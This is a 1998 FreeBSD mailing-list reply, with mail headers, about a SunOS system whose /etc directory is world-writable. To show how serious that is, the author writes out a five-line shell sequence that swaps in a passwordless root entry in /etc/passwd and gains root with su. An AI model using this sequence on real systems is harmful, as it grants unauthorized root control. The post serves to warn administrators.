From owner-freebsd-questions Thu Dec 17 20:17:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11702 for freebsd-questions-outgoing; Thu, 17 Dec 1998 20:17:35 -0800 (PST) (envelope-from owner-freebsd-questions@FreeBSD.ORG) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11697 for ; Thu, 17 Dec 1998 20:17:33 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id XAA17904 for freebsd-questions@FreeBSD.ORG; Thu, 17 Dec 1998 23:18:08 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199812180418.XAA17904@cc942873-a.ewndsr1.nj.home.com> Subject: Re: Basic Security Question In-Reply-To: <3678D0CF.7FA8B106@uk.radan.com> from Mark Ovens at "Dec 17, 98 09:37:19 am" To: marko@uk.radan.com (Mark Ovens) Date: Thu, 17 Dec 1998 22:04:04 -0500 (EST) Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Mark Ovens wrote, > and on all the Sparcs running SunOS4.1.3_U1 here are: > > gppsun4:/{8}% ls -ldug etc > drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc > > which is even less secure as it's writable by all! I may be dense. Is that some kind of joke or something? As dense as I am, I know for sure that even I could take any account on a system with permissions like that and have control of root in this many keystrokes: % cd /etc % echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new % mv passwd passwd.old % mv passwd.new passwd % su # BUWHAHAHA! -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message